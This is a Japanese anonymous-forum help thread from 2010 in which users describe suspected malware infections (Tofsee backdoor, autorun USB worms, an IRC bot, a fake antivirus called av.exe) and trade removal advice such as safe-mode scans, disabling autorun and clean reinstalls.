昨日は特に何もしていないのですが・・・
とりあえずチェストへ移動しましたが、どなたかよろしければご教授願います。
【Microsoft Update(MU)の状態】 「自動更新」
【使用セキュリティソフトとバージョン】 「Avast4.8 Home Edition」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「自動更新」
【スパイウェア対策ソフト】 「同上」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「同上」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「C:\WINDOWS\system32\apkruisi.dll」
PCを立ち上げてすぐ検出しました。
昨日は特に何もしていないのですが・・・
とりあえずチェストへ移動しましたが、どなたかよろしければご教授願います。
387 :名無しさん@お腹いっぱい。:2010/01/31(日) 14:46:15
388 :名無しさん@お腹いっぱい。:2010/01/31(日) 22:08:23
【使用OS】 Win XP Pro SP3
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】MS Security Essentials
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】最新
【スパイウェア対策ソフト】Ad-Aware
【スパイウェア対策ソフトの更新は定期的に行なっているか】YES
【ルータの有無】有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
Backdoor:Win32/TofseeI っていうウイルスが 検出されますが、
削除しても削除してもまた検出されました。と出てきます。
対処方法教えて下さい。よろしくお願いします。
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】MS Security Essentials
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】最新
【スパイウェア対策ソフト】Ad-Aware
【スパイウェア対策ソフトの更新は定期的に行なっているか】YES
【ルータの有無】有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
Backdoor:Win32/TofseeI っていうウイルスが 検出されますが、
削除しても削除してもまた検出されました。と出てきます。
対処方法教えて下さい。よろしくお願いします。
389 :名無しさん@お腹いっぱい。:2010/01/31(日) 22:25:42
>>388
追加:
これらしいんですが、肝心な対処方法が無いんです><
http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Backdoor%3AWin32%2FTofsee.I&ThreatID=-2147346214
追加:
これらしいんですが、肝心な対処方法が無いんです><
http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Backdoor%3AWin32%2FTofsee.I&ThreatID=-2147346214
390 :名無しさん@お腹いっぱい。:2010/01/31(日) 22:44:14
>>389
そこのリンクの中にBackdoor:Win32/Tofsee.F(Tofsee.Iは亜種だろう)のリンクがあるから参考にしてみては?
しかし基本のRunエントリの登録をはじめ、あちこちにばらまいてるみたいだな・・・
ttp://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Backdoor%3aWin32%2fTofsee.F
そこのリンクの中にBackdoor:Win32/Tofsee.F(Tofsee.Iは亜種だろう)のリンクがあるから参考にしてみては?
しかし基本のRunエントリの登録をはじめ、あちこちにばらまいてるみたいだな・・・
ttp://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Backdoor%3aWin32%2fTofsee.F
391 :八頭 ◆YAGApwSaEw :2010/02/03(水) 21:06:27
>>383
「W32.SillyFDC〜」ってのはオートランマルウェア(自動で走り出すウイルス)の呼称
IPA 情報処理推進機構
●Windowsの自動実行(オートラン)機能を無効にする ※USBメモリの使用に関わらず必ず適用しておくこと! → PC再起動
ttp://www.ipa.go.jp/security/txt/2009/05outline.html
・・・そのdaemonをダウンロードしたサイトURL覚えてたらavastへ確認依頼のMailを出せばいいよ
>>388-390
ttps://www.virustotal.com/analisis/5d472d1b0dd642bd02cecbd1f85c830d25a967bd3b31803dfa973995df0d4098-1264202589
↓
higaitaisaku.com - Windowsをセーフモードで起動する → Windows XPの場合 → セーフモードスキャンで駆除を試みてください
ttp://www.higaitaisaku.com/safemode.html
MS Security Essentialsは他のセキュリティソフトをと併用できないのが難点なんだよなぁ
「W32.SillyFDC〜」ってのはオートランマルウェア(自動で走り出すウイルス)の呼称
IPA 情報処理推進機構
●Windowsの自動実行(オートラン)機能を無効にする ※USBメモリの使用に関わらず必ず適用しておくこと! → PC再起動
ttp://www.ipa.go.jp/security/txt/2009/05outline.html
・・・そのdaemonをダウンロードしたサイトURL覚えてたらavastへ確認依頼のMailを出せばいいよ
>>388-390
ttps://www.virustotal.com/analisis/5d472d1b0dd642bd02cecbd1f85c830d25a967bd3b31803dfa973995df0d4098-1264202589
↓
higaitaisaku.com - Windowsをセーフモードで起動する → Windows XPの場合 → セーフモードスキャンで駆除を試みてください
ttp://www.higaitaisaku.com/safemode.html
MS Security Essentialsは他のセキュリティソフトをと併用できないのが難点なんだよなぁ
392 :名無しさん@お腹いっぱい。:2010/02/04(木) 14:49:41
お助けください・・・
【使用OS】 「Windows XP pro」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「avast」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「自動
【スパイウェア対策ソフト】 「同上」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「同上」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか】 win32:Malware-gen
最初はトロイとマルウェアが検出されたのですが
全てチェスとにうつし再起動しましたところ、win32:Malware-genが消しても消しても
復活してしまう状態になってしまいました。
そこで、LANケーブルを抜いて起動しましたところ
反応しなかったので、直ったかな?と思い、そのままLANケーブルをさしたら
すぐさまwin32:Malware-genが検出されました・・・
オンラインのウィルスバスターで検索しても
何も検出されず、潜伏型ウィルス?と思われます・・・
PCの挙動もおかしくブラウジングがスムーズじゃなくなっております・・・
どうしたらいいでしょうか
【使用OS】 「Windows XP pro」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「avast」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「自動
【スパイウェア対策ソフト】 「同上」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「同上」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか】 win32:Malware-gen
最初はトロイとマルウェアが検出されたのですが
全てチェスとにうつし再起動しましたところ、win32:Malware-genが消しても消しても
復活してしまう状態になってしまいました。
そこで、LANケーブルを抜いて起動しましたところ
反応しなかったので、直ったかな?と思い、そのままLANケーブルをさしたら
すぐさまwin32:Malware-genが検出されました・・・
オンラインのウィルスバスターで検索しても
何も検出されず、潜伏型ウィルス?と思われます・・・
PCの挙動もおかしくブラウジングがスムーズじゃなくなっております・・・
どうしたらいいでしょうか
書き忘れましたがexeファイルを実行したことにより感染してしまいました・・・
394 :名無しさん@お腹いっぱい。:2010/02/04(木) 15:13:13
>>392
ざまぁwwwww
ざまぁwwwww
テンプレにある解析サービスで調べてみましたところ
Packed.Win32.Krap.agというのが入ってたようですorz
Packed.Win32.Krap.agというのが入ってたようですorz
http://www.virustotal.com/jp/analisis/f1d3e27ddeb7074fd38ae8754a907e9da67b5af6ad24607e427f831ca0bbc232-1265264348
結果をこちらにお貼りします。
ベンダーごとでウィルスの名前が変わってしまって
ウィルスの詳細を調べることができないのですが
avastでは無反応だったので、かすぺの無料を入れて検査駆除した方がいいのでしょうか?
ただいまセーフモードにてavastで完全検査してますが
ものすごく時間かかりそうですorz
結果をこちらにお貼りします。
ベンダーごとでウィルスの名前が変わってしまって
ウィルスの詳細を調べることができないのですが
avastでは無反応だったので、かすぺの無料を入れて検査駆除した方がいいのでしょうか?
ただいまセーフモードにてavastで完全検査してますが
ものすごく時間かかりそうですorz
397 :名無しさん@お腹いっぱい。:2010/02/04(木) 20:20:27
>>384
うちも06.exeの方だけですが同じウイルスが見つかりました。
色々調べた結果USBから感染していたようで、autorun.infというファイルも一緒にあると思います。
ttp://orbit.cocolog-nifty.com/supportdiary/2009/05/usbautoruninfmm.html
ここのサイトを参考にしたのですが、autorun.infの名前を変えて、再作成されないようダミーを作って、
隠しファイルを表示させて、06.exeを削除した後、06.exeについてもダミーを作れば完全に削除できました。
ただ、各ドライブにあるので削除漏れがあればまたそこから広がってしまいますが…。
うちも06.exeの方だけですが同じウイルスが見つかりました。
色々調べた結果USBから感染していたようで、autorun.infというファイルも一緒にあると思います。
ttp://orbit.cocolog-nifty.com/supportdiary/2009/05/usbautoruninfmm.html
ここのサイトを参考にしたのですが、autorun.infの名前を変えて、再作成されないようダミーを作って、
隠しファイルを表示させて、06.exeを削除した後、06.exeについてもダミーを作れば完全に削除できました。
ただ、各ドライブにあるので削除漏れがあればまたそこから広がってしまいますが…。
398 :名無しさん@お腹いっぱい。:2010/02/04(木) 20:42:12
しまんてっくで検査したら
Backdoor.IRC.Botと結果がでましたorz
Backdoor.IRC.Botと結果がでましたorz
399 :名無しさん@お腹いっぱい。:2010/02/04(木) 22:59:33
ウィルスに感染しちゃったよぉ
しかもBackdoor.IRC.Botとかたち悪い奴だ・・・
修復インスこじゃまずいかな?
おとなしくクリーンいんすこ?><
しかもBackdoor.IRC.Botとかたち悪い奴だ・・・
修復インスこじゃまずいかな?
おとなしくクリーンいんすこ?><
400 :八頭 ◆YAGApwSaEw :2010/02/05(金) 00:46:20
401 :名無しさん@お腹いっぱい。:2010/02/05(金) 15:08:57
クリーンインストール完了しました!
ただいまオンラインスキャンで再検査しております
ただいまオンラインスキャンで再検査しております
402 :名無しさん@お腹いっぱい。:2010/02/05(金) 15:33:35
無事解決したようです。
お騒がせしました
お騒がせしました
403 :名無しさん@お腹いっぱい。:2010/02/14(日) 20:09:58
初めて書き込ませて頂きます。
私はデイトレで生計を立てている者です。
実は、最近になって自分のPCの内容が
どこかで晒されてるらしいという事が分かり、
今、その場所・原因などを探しているのですが、
その過程でこのスレに辿り着きました。
そこで、ここの住民の方に質問したいのですが、
『最近、どこかでデイトレ中の画面・音声などが
リアルタイムで晒されている』
という情報をご存知の方はいないでしょうか?
何か知っているからがいたら、教えてください。
よろしくお願い致します。 m(_ _)m
私はデイトレで生計を立てている者です。
実は、最近になって自分のPCの内容が
どこかで晒されてるらしいという事が分かり、
今、その場所・原因などを探しているのですが、
その過程でこのスレに辿り着きました。
そこで、ここの住民の方に質問したいのですが、
『最近、どこかでデイトレ中の画面・音声などが
リアルタイムで晒されている』
という情報をご存知の方はいないでしょうか?
何か知っているからがいたら、教えてください。
よろしくお願い致します。 m(_ _)m
404 :名無しさん@お腹いっぱい。:2010/02/15(月) 10:56:56
あまりにも不用意すぎて怒られたり、情報を頂けないかも分かりませんが、
ぜひ、教えて下さい。
ウイルスソフト等をインストールせずに、Microsoft Updateのみで、
今まで、PCを使っていました…
昨日、PCを起動したら、何回も「vwke.exeを終了します」と言った
メッセージが出て、HDDは動きっぱなし、Cドライブの直下に、
lsass.exe、vwke.exe、gcoiu.exeと、3つの見知らぬファイルが
出来ていました。gcoiu.exeは普通に削除出来たんですが、
vwke.exeは、基本的に削除不可。たまに削除出来ても、また、
すぐに出来るって感じで、lsass.exeは全く削除出来ませんでした。
ウイルスソフトもなく、オンラインスキャンをしようにも、ネットに
接続するのが怖かったので、結局、何のウイルスか調べもせずに、
リカバリをかけて、今は、何もないように思われます。
ぜひ、教えて下さい。
ウイルスソフト等をインストールせずに、Microsoft Updateのみで、
今まで、PCを使っていました…
昨日、PCを起動したら、何回も「vwke.exeを終了します」と言った
メッセージが出て、HDDは動きっぱなし、Cドライブの直下に、
lsass.exe、vwke.exe、gcoiu.exeと、3つの見知らぬファイルが
出来ていました。gcoiu.exeは普通に削除出来たんですが、
vwke.exeは、基本的に削除不可。たまに削除出来ても、また、
すぐに出来るって感じで、lsass.exeは全く削除出来ませんでした。
ウイルスソフトもなく、オンラインスキャンをしようにも、ネットに
接続するのが怖かったので、結局、何のウイルスか調べもせずに、
リカバリをかけて、今は、何もないように思われます。
405 :404の続き:2010/02/15(月) 10:58:13
ちなみに、データを退避しようと、SDカードを突っ込んだら、
autorun.infとautorun.exeがSDカード内に出来てしまい、
PCのリカバリ後、SDカードからそのファイルを削除したのですが、
オンラインスキャンをかけたところ、削除したにも関わらず、
SDカードドライブ:\RECYCLERって場所のautorunがウイルス検出
されました。オンラインスキャンが削除した模様ですが、
手動でドライブ内のファイルを削除しても、プロパティでまだ、
使用領域で数KB存在していたので、とりあえずフォーマットして、
オンラインスキャンする事で、今は大丈夫かと思います。
この一連の事象から、どんなウイルスに感染し、どんな活動が
行われていたか、感染に気付かず、昨日以前に感染していたと
して、ネットに繋いだ場合、どんな事が考えられるかなど、
教えていただけないでしょうか?
よろしくお願い致します。
autorun.infとautorun.exeがSDカード内に出来てしまい、
PCのリカバリ後、SDカードからそのファイルを削除したのですが、
オンラインスキャンをかけたところ、削除したにも関わらず、
SDカードドライブ:\RECYCLERって場所のautorunがウイルス検出
されました。オンラインスキャンが削除した模様ですが、
手動でドライブ内のファイルを削除しても、プロパティでまだ、
使用領域で数KB存在していたので、とりあえずフォーマットして、
オンラインスキャンする事で、今は大丈夫かと思います。
この一連の事象から、どんなウイルスに感染し、どんな活動が
行われていたか、感染に気付かず、昨日以前に感染していたと
して、ネットに繋いだ場合、どんな事が考えられるかなど、
教えていただけないでしょうか?
よろしくお願い致します。
406 :名無しさん@お腹いっぱい。:2010/02/15(月) 22:00:37
阻むソフトが無いから
よってたかって情報レイプされた状態
乗っ取られた環境は、次々に悪意を呼び寄せて更に拡散の踏み台にされる
よってたかって情報レイプされた状態
乗っ取られた環境は、次々に悪意を呼び寄せて更に拡散の踏み台にされる
407 :名無しさん@お腹いっぱい。:2010/02/16(火) 22:59:04
先日、講義中に「いちきゅーにいちろくはちぜろちょんいち!」って叫んだ学生がいた
何かあったんだろうか
何かあったんだろうか
408 :名無しさん@お腹いっぱい。:2010/02/20(土) 20:41:30
409 :名無しさん@お腹いっぱい。:2010/02/20(土) 23:18:28
410 :名無しさん@お腹いっぱい。:2010/02/22(月) 14:11:07
VistaHomePremiumです。
ヤフーオークション見てたら、画面が真っ黒になりました。
Gumbler等のウイルスに感染してるかもしれないと思い、
NTTフレッツ光のセキュリティソフトでスキャンをかけましたが
ウィルスは検出されませんでした。
セキュリティソフトのアンインストール、インストールが煩雑なため
他のセキュリティソフトではチェックしていません。
Gumblerに感染しているかどうか
他の方法でチェックした方が良いのでしょうか?
お薦めの方法があれば教えて下さい。
ヤフーオークション見てたら、画面が真っ黒になりました。
Gumbler等のウイルスに感染してるかもしれないと思い、
NTTフレッツ光のセキュリティソフトでスキャンをかけましたが
ウィルスは検出されませんでした。
セキュリティソフトのアンインストール、インストールが煩雑なため
他のセキュリティソフトではチェックしていません。
Gumblerに感染しているかどうか
他の方法でチェックした方が良いのでしょうか?
お薦めの方法があれば教えて下さい。
411 :名無しさん@お腹いっぱい。:2010/02/23(火) 15:45:16
412 :名無しさん@お腹いっぱい。:2010/02/23(火) 15:49:28
VDSLをやめて専用線にする
413 :名無しさん@お腹いっぱい。:2010/02/24(水) 15:39:51
414 :名無しさん@お腹いっぱい。:2010/02/27(土) 13:16:19
【使用OS】 Vista
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 MSE
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
【スパイウェア対策ソフト】 Ad-Aware 8.07
【スパイウェア対策ソフトの更新は定期的に行なっているか】 行っている
【ルータの有無】 あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
今のところなしなのですが、
1)Tempの下にpdk/1bb604da0534c66b6d5f15709bd70210.dllなどのファイルを作成される
2)Windows/System32/以下に
7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
両者ともファイル名を検索するといくつかひっかかるのですが、今ひとつはっきりしません。
2)に関してはアクチベーションがらみとも思われるのですが。
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 MSE
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
【スパイウェア対策ソフト】 Ad-Aware 8.07
【スパイウェア対策ソフトの更新は定期的に行なっているか】 行っている
【ルータの有無】 あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
今のところなしなのですが、
1)Tempの下にpdk/1bb604da0534c66b6d5f15709bd70210.dllなどのファイルを作成される
2)Windows/System32/以下に
7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
両者ともファイル名を検索するといくつかひっかかるのですが、今ひとつはっきりしません。
2)に関してはアクチベーションがらみとも思われるのですが。
415 :名無しさん@お腹いっぱい。:2010/02/27(土) 23:34:47
vistaのウィルス誤認(?)について相談させてください。
使用OSはVistaです。
昨日、Cで書いたプログラムをコンパイルして実行すると
この方( http://d.hatena.ne.jp/fkm/20071116 )が書いてらっしゃることとまったく
同じことが起きました。(コンパイルもgcc使っていてこの方と同じです。)
Vistaでは実行ファイル名a.exeやb.exeがランタイムエラーを起こすとウィルスと勘違いされるらしいのですが
このような経験をされた方他にもいらっしゃいますか?
ちなみに、僕が実験するとa.exeとb.exeではソースは同じでも検出されるウィルスの種類が違いました。
使用OSはVistaです。
昨日、Cで書いたプログラムをコンパイルして実行すると
この方( http://d.hatena.ne.jp/fkm/20071116 )が書いてらっしゃることとまったく
同じことが起きました。(コンパイルもgcc使っていてこの方と同じです。)
Vistaでは実行ファイル名a.exeやb.exeがランタイムエラーを起こすとウィルスと勘違いされるらしいのですが
このような経験をされた方他にもいらっしゃいますか?
ちなみに、僕が実験するとa.exeとb.exeではソースは同じでも検出されるウィルスの種類が違いました。
416 :名無しさん@お腹いっぱい。:2010/02/28(日) 07:40:02
[環境]Cドライブ:WindowsXPproSP2,Dドライブ:VistaUltimate,
Hドライブ:Windows7Ultimate(マルチブート環境)
[状況]
Winows7がウィルスに感染している可能性があると思い。
XPでオンラインスキャン等を行ったところ、
(1)SymantecSecurityCheck(ウィルス検出)で次のメッセージが表示されました。
H:\Windows\winsxs\x86_microsoft-windows-tvencdec_31bf3856ad364e35_
6.1.7600.16385_none_e04e6c93efba3643\EncDec.dll は
Packed.Generic.271 に感染しています。
H:\Windows\System32\EncDec.dll は
Packed.Generic.271 に感染しています。
(2)トレンドマイクロのオンラインスキャン、AVG9.0でのスキャンでは
何も検出されませんでした。
どうすれば良いのでしょうか?
よろしくお願いします。
Hドライブ:Windows7Ultimate(マルチブート環境)
[状況]
Winows7がウィルスに感染している可能性があると思い。
XPでオンラインスキャン等を行ったところ、
(1)SymantecSecurityCheck(ウィルス検出)で次のメッセージが表示されました。
H:\Windows\winsxs\x86_microsoft-windows-tvencdec_31bf3856ad364e35_
6.1.7600.16385_none_e04e6c93efba3643\EncDec.dll は
Packed.Generic.271 に感染しています。
H:\Windows\System32\EncDec.dll は
Packed.Generic.271 に感染しています。
(2)トレンドマイクロのオンラインスキャン、AVG9.0でのスキャンでは
何も検出されませんでした。
どうすれば良いのでしょうか?
よろしくお願いします。
417 :416:2010/02/28(日) 09:29:45
追加情報です。
今、Symantecのノートン アンチウィルスの体験版をダウンロードして
スキャンしたところ、ウイルスは検出されませんでした。
今、Symantecのノートン アンチウィルスの体験版をダウンロードして
スキャンしたところ、ウイルスは検出されませんでした。
418 :416:2010/02/28(日) 12:32:44
連投で申し訳ありません。別件(多分)の質問です。
ヤフーオークションにログインするパスワードを忘れたので、
ヤフーのホームページで調べようとしたら、
本人確認のために、クレジットカードの番号入力を求められました。
これってフィッシングじゃないでしょうか?
URLは次の通りです。
https://account.edit.yahoo.co.jp/forgot
ヤフーオークションにログインするパスワードを忘れたので、
ヤフーのホームページで調べようとしたら、
本人確認のために、クレジットカードの番号入力を求められました。
これってフィッシングじゃないでしょうか?
URLは次の通りです。
https://account.edit.yahoo.co.jp/forgot
419 :名無しさん@お腹いっぱい。:2010/02/28(日) 14:41:45
420 :名無しさん@お腹いっぱい。:2010/03/04(木) 11:05:21
【使用OS】 「Windows Vista」
【Microsoft Update(MU)の状態】 「UPDATEした」
【使用セキュリティソフトとバージョン】 「使用していない」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「AVG9」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
DELLのメインPCがタコイカウイルスにやられました。
とりあえずすぐにタスクマネージャでウイルスを強制終了して
見た目が変化していない無事?だったファイル(主にアニメとエロ動画)をUSBメモリに保存。
駆除のため、セーフモードで再起動しようとしたところ
raid0構成していたHDDがクラッシュして?起動せず。リストアもできない。
Windows Boot Manager
windows failed to start.A recent hardware or software change
might be the cause.To fix the problem:
まあそれは仕方ないとして、予備のノートで無事だったファイルを利用したいのですが
AVIRAを入れてこのファイルを開けば問題なく利用出来るのでしょうか?
それとも破棄した方がいいのでしょうか?
【Microsoft Update(MU)の状態】 「UPDATEした」
【使用セキュリティソフトとバージョン】 「使用していない」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「AVG9」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
DELLのメインPCがタコイカウイルスにやられました。
とりあえずすぐにタスクマネージャでウイルスを強制終了して
見た目が変化していない無事?だったファイル(主にアニメとエロ動画)をUSBメモリに保存。
駆除のため、セーフモードで再起動しようとしたところ
raid0構成していたHDDがクラッシュして?起動せず。リストアもできない。
Windows Boot Manager
windows failed to start.A recent hardware or software change
might be the cause.To fix the problem:
まあそれは仕方ないとして、予備のノートで無事だったファイルを利用したいのですが
AVIRAを入れてこのファイルを開けば問題なく利用出来るのでしょうか?
それとも破棄した方がいいのでしょうか?
421 :名無しさん@お腹いっぱい。:2010/03/04(木) 11:10:01
あとAviraとAVGの競合を考慮すればAVGを消した方がいいのでしょうか?
422 :名無しさん@お腹いっぱい。:2010/03/12(金) 01:10:01
【使用OS】 「Windows7」
【Microsoft Update(MU)の状態】 「最新の状態です」
【使用セキュリティソフトとバージョン】 「AVG9 free」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新です」
【スパイウェア対策ソフト】 「spybot-S&D」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「気づいた時に更新しています」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
何が検出されたという事ではないのですが
タスクマネージャーを起動し、プロセスを見てみると
「csrss.exe」というものが2つありました。
プロパティを開いてみて場所を確認しても、二つともsystem32という場所にあるみたいです。
ウィルス検索をしてみても反応がありません。
これはウィルスなのでしょうか?
今の所異常は何もないのですが、少し不安なので質問させて貰いました。
【Microsoft Update(MU)の状態】 「最新の状態です」
【使用セキュリティソフトとバージョン】 「AVG9 free」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新です」
【スパイウェア対策ソフト】 「spybot-S&D」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「気づいた時に更新しています」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
何が検出されたという事ではないのですが
タスクマネージャーを起動し、プロセスを見てみると
「csrss.exe」というものが2つありました。
プロパティを開いてみて場所を確認しても、二つともsystem32という場所にあるみたいです。
ウィルス検索をしてみても反応がありません。
これはウィルスなのでしょうか?
今の所異常は何もないのですが、少し不安なので質問させて貰いました。
423 :名無しさん@お腹いっぱい。:2010/03/12(金) 18:12:44
【使用OS】 「WindowsXP SP3」
【Microsoft Update(MU)の状態】 「最新の状態」
【使用セキュリティソフトとバージョン】 「Kingsoft Internet Security U SP1」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「Ad-Aware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「最新」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
何も検出されず。
普段IEは使用しないので、表示していないのですがいつの間にかデスクトップにIEのアイコンが表示されており
気になって見てみると、デスクトップにIEが2個あります。片方は元々入っているIE8でウィルスっぽいのがIE6のアイコンです。
右クリックしてみると「open(O)、 ハ・ヤ(D)、 切り取り(T)、 ショートカットの作成(S)」の項目が出ており、削除しようにも削除を受け付けてくれません。
削除する方法はありますか?
【Microsoft Update(MU)の状態】 「最新の状態」
【使用セキュリティソフトとバージョン】 「Kingsoft Internet Security U SP1」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「Ad-Aware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「最新」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
何も検出されず。
普段IEは使用しないので、表示していないのですがいつの間にかデスクトップにIEのアイコンが表示されており
気になって見てみると、デスクトップにIEが2個あります。片方は元々入っているIE8でウィルスっぽいのがIE6のアイコンです。
右クリックしてみると「open(O)、 ハ・ヤ(D)、 切り取り(T)、 ショートカットの作成(S)」の項目が出ており、削除しようにも削除を受け付けてくれません。
削除する方法はありますか?
424 :名無しさん@お腹いっぱい。:2010/03/12(金) 23:42:04
【av.exe】削除の方法が分かる方よろしくお願いします。
opera9.64でウェブを閲覧中にavastから警告
その後にXPのセキュリティセンターが起動
直後に英語のXP internet security unregistred version というXPのセキュリティセンターそっくりのソフトが起動
こんな感じ→http://www.virusremovalguru.com/wp-content/uploads/2010/02/xpanti2.JPG
(※ただし、↑の画像のAntiapayware2010の部分がinternet security unregistred versionとなっている)
赤色の進歩状況とともに37個ぐらいのスパイウェアを検出していく・・・という画面になる
検出が終わるとregist(登録)するように促す画面になる。
タスクマネージャーを見ると
av.exe
という見慣れないプログラムが動いていた。
終了させると先の「英語版のXP internet security unregistred version」は終了する
av.exeで検索したらVirus Removal Guruというウイルス駆除サイト
http://www.virusremovalguru.com/?p=5548&lang=ja
が見つかるのだが
コンピューター翻訳したような日本語でいまいち削除のしかたがわからない。
【使用OS】 XPSP2
【Microsoft Update(MU)の状態】 更新を通知 手動でダウンロード
【使用セキュリティソフトとバージョン】 avast 4.8 home edition、 Sygate personal firewall 5.6 build 2818
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「avastは最新」
【スパイウェア対策ソフト】 「spybot 1.6.2.0」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「いいえ」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「スキャンはまだしていない」
opera9.64でウェブを閲覧中にavastから警告
その後にXPのセキュリティセンターが起動
直後に英語のXP internet security unregistred version というXPのセキュリティセンターそっくりのソフトが起動
こんな感じ→http://www.virusremovalguru.com/wp-content/uploads/2010/02/xpanti2.JPG
(※ただし、↑の画像のAntiapayware2010の部分がinternet security unregistred versionとなっている)
赤色の進歩状況とともに37個ぐらいのスパイウェアを検出していく・・・という画面になる
検出が終わるとregist(登録)するように促す画面になる。
タスクマネージャーを見ると
av.exe
という見慣れないプログラムが動いていた。
終了させると先の「英語版のXP internet security unregistred version」は終了する
av.exeで検索したらVirus Removal Guruというウイルス駆除サイト
http://www.virusremovalguru.com/?p=5548&lang=ja
が見つかるのだが
コンピューター翻訳したような日本語でいまいち削除のしかたがわからない。
【使用OS】 XPSP2
【Microsoft Update(MU)の状態】 更新を通知 手動でダウンロード
【使用セキュリティソフトとバージョン】 avast 4.8 home edition、 Sygate personal firewall 5.6 build 2818
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「avastは最新」
【スパイウェア対策ソフト】 「spybot 1.6.2.0」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「いいえ」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「スキャンはまだしていない」
425 :名無しさん@お腹いっぱい。:2010/03/15(月) 18:59:59
・spybotでスキャン・修正・削除
・ディスククリーンアップ
・ウィンドウズ復元ファイルを削除
・レジストリクリーナー(NTREGOPT)
これで解決したみたいです。
>>424つづき
spybotの検出結果
■Microsoft.Windows.FileExe 1エントリ Security
(SBI $D204F52E) 設定
HKEY_CLASSES_ROOT\.exe\(is not) exefile レジストリ変更
■Microsoft.WindowsSecurityCenter.AntiVirusOverride 1エントリ Security
(SBI $3604910C) 設定
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusOverride (is not) dword:0 レジストリ変更
■Microsoft.Windows.SecurityCenter.FirewallOverride 1エントリ Security
(SBI $0C94D702) 設定
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\FirewallOverride (is not) dword:0
レジストリ変更
(以上の3件)を修正・削除後にも>>424の症状になる。
Windows復元ファイルを削除してレジストリクリーナーNTREGOPTをかけたら出なくなりました。
※avast4.8のスキャンでは何も検出されない
※この際ウィンドウズの更新(セキュリティ関係の)をしました。
※>>424のようになった時にWindowsファイアーウォール及びセキュリティセンターを起動しようとしても
代わりに「英語版のXP internet security unregistred version」が起動してしまいます。
※>>424の3行目
>その後にXPのセキュリティセンターが起動
この時ファイアーウォールとウイルス対策が無効になっていました。
もしかしたらニセの画面だったのかも
※とりあえずav.exeを終了するにはタスクマネージャー>プロセスの終了
・ディスククリーンアップ
・ウィンドウズ復元ファイルを削除
・レジストリクリーナー(NTREGOPT)
これで解決したみたいです。
>>424つづき
spybotの検出結果
■Microsoft.Windows.FileExe 1エントリ Security
(SBI $D204F52E) 設定
HKEY_CLASSES_ROOT\.exe\(is not) exefile レジストリ変更
■Microsoft.WindowsSecurityCenter.AntiVirusOverride 1エントリ Security
(SBI $3604910C) 設定
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusOverride (is not) dword:0 レジストリ変更
